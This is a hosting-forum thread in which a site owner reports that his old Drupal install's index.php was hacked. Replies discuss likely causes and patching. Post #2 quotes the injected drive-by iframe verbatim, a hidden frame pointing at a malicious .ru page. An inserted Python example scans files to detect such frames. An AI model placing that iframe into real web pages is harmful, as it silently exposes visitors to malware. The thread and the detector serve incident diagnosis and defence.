
This is a discussion on Drupal hacked in the Shared & Semi-Dedicated forum

  1. #1
    Loyal Client
    Join Date
    Jan 2005
    Posts
    159

    Drupal hacked

    One of my Drupal sites got hacked for the second time with the *same* hack.

    The index.php has an iframe in it at the end that opens up a website that tries to install a program on your computer (only works for old browsers).

    Because of this, Google has listed my site as having malicious software in the search engine results.

    This looks like the relevant drupal page:
    http://drupal.org/node/233516

    Has this happened to anyone else?

    Aaron

  2. #2
    Loyal Client
    Join Date
    Jan 2005
    Posts
    159
    It got hacked Aug 11, 10:38am (US EST).

    Added this to the Drupal index.php:

    <iframe src='http://rulon-oboev.ru/corep/index.php' width='0' height='0' style='visibility: hidden' scrolling='no' framespacing='0' frameborder='no'></iframe>

    My permissions for the file are 0644. So only the owner should be able to write it.
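
A way to sweep a whole docroot for the kind of invisible frame quoted above, added here as an example and not code from anyone in the thread. It reports each hit's mode and modification time so the change can be lined up against access and FTP logs; the extension list and the placeholder host in the sample are assumptions.

```python
import os
import re
import stat
import time

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
# Attributes that hide a frame: zero width/height, or hidden/none styling.
HIDDEN_RE = re.compile(
    r"""(?:width|height)\s*=\s*['"]?0(?:px)?['"]?(?=[\s>/]|$)"""
    r"""|visibility\s*:\s*hidden|display\s*:\s*none""",
    re.IGNORECASE,
)
SRC_RE = re.compile(r"""src\s*=\s*['"]?([^'"\s>]+)""", re.IGNORECASE)
EXTENSIONS = (".php", ".html", ".htm", ".inc", ".tpl")  # assumed list

# Constructed sample: a PHP file tail with an injected frame (placeholder host).
SAMPLE = (
    "<?php\nrequire_once './includes/bootstrap.inc';\n?>\n"
    "<iframe src='http://injected.example/index.php' width='0' height='0' "
    "style='visibility: hidden' frameborder='no'></iframe>\n"
    "<iframe src='/video/embed' width='560' height='315'></iframe>\n"
)

def find_hidden_iframes(text):
    """Return the src of every iframe whose attributes hide it from the visitor."""
    hits = []
    for match in IFRAME_RE.finditer(text):
        if HIDDEN_RE.search(match.group(1)):
            src = SRC_RE.search(match.group(1))
            hits.append(src.group(1) if src else "(no src)")
    return hits

def scan_tree(root):
    """Return (path, mode, mtime, srcs) for each file under root with a hidden iframe."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                srcs = find_hidden_iframes(fh.read())
            if srcs:
                st = os.stat(path)
                mtime = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(st.st_mtime))
                findings.append((path, oct(stat.S_IMODE(st.st_mode)), mtime, srcs))
    return findings

if __name__ == "__main__":
    print(find_hidden_iframes(SAMPLE))  # visible 560x315 frame is not reported
```

Run `scan_tree` against the account's web root; a cluster of hits sharing one modification time points to a single write event worth tracing in the logs.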

  3. #3
    Loyal Client
    Join Date
    Jan 2005
    Posts
    159
    You can see this happened 10 months ago and affected a LOT of users.

    Hacker Attack

  4. #4
    Community Leader jason's Avatar
    Join Date
    Sep 2001
    Location
    Rochester, NY
    Posts
    6,003
    The way that PHP is configured on JPC's servers is such that scripts are run under their owner's UID, so someone with malicious intent can often easily access and deface the scripts on your site. While this seems like a bad thing it is actually a good idea overall--an attacker can, at most, only deface a single site, not a whole server and he leaves much better tracks that way as well.

    You should also consider that it might not be an attack against Drupal that is to blame. Do you run any other software in your account like forums or blogs? It is quite possible that an attack against one of those resulted in the Drupal defacement as the ownership would be the same on both.

    --Jason
    Jason Pitoniak
    Interbrite Communications
    www.interbrite.com www.kodiakskorner.com

  5. #5
    Loyal Client
    Join Date
    Jan 2005
    Posts
    159
    This account only runs two versions of Drupal. Very low traffic (1000 visits/month).

    The Drupal 5.1 index.php got hacked. It is an old version of Drupal (and I know I should probably upgrade, but it's for such a minor site...)

    This really looks exactly like what happened 10 months ago and affected thousands of people across the internet - when it was the fault of the webhosting companies.

    So far my one "fix" is to change the permissions to 444 for index.php (they were 644) - that was suggested in Drupal forums.

  6. #6
    CTO JPC-Masood's Avatar
    Join Date
    Aug 2002
    Location
    Jaguar Servers
    Posts
    2,070
    Quote Originally Posted by akreider2 View Post
    The Drupal 5.1 index.php got hacked. It is an old version of Drupal (and I know I should probably upgrade, but it's for such a minor site...)
    Please see if one of these vulnerabilities still exists in your install:

    http://secunia.com/product/13378/?task=advisories

    Masood N. | Chief Technical Officer
    JaguarPC.com



  7. #7
    Old Hillbilly Connie's Avatar
    Join Date
    Sep 2001
    Location
    Hills of Missouri
    Posts
    2,648
    Quote Originally Posted by akreider2 View Post
    This account only runs two versions of Drupal. Very low traffic (1000 visits/month).

    The Drupal 5.1 index.php got hacked. It is an old version of Drupal (and I know I should probably upgrade, but it's for such a minor site...)

    This really looks exactly like what happened 10 months ago and affected thousands of people across the internet - when it was the fault of the webhosting companies.

    So far my one "fix" is to change the permissions to 444 for index.php (they were 644) - that was suggested in Drupal forums.
    I disagree that the blame can be laid on the webhost. There were 1000's of sites hacked in a lot of different countries.

    Your old un-updated Drupal software may have been the culprit. How do you log into your CP? How do you check email? How do you connect to the server to upload files?

    If you're not using secure connections for all the above a packet sniffer may have got your login information.

    These were very advanced hackers. As far as I know, no one knows for sure how they gained access to the hacked sites. There could have been multiple methods.

    Months later I still get traffic to this Blog post about the IFrame Hack.

    I think as soon as the support staff found out that sites on their servers were being hacked they acted responsibly. Even if and I emphasize if it was a weakness on their part, the only way you find out about a weakness is when someone exploits it.

    Your virus software updates after a new virus is discovered. Your browser updates after weaknesses are discovered.

    It's easy to say it's the host fault. Website owners have the responsibility of keeping their stuff up to date.

    It is possible that if you had updated your Drupal install that receives very little traffic that you would not have been hacked. After all the updated version did not get hacked.

    Why did Drupal offer an update? They discovered a hole that needed to be patched.

    Forum Moderators - Jag Staff

    Spam Whackers Blog - Dedicated to fighting Spam and providing General SEO Tips
    Organize your Kitchen or purchase Kitchen Accessories at Condells
    Ihelpyou Forum - Dedicated to "Best Practices" SEO
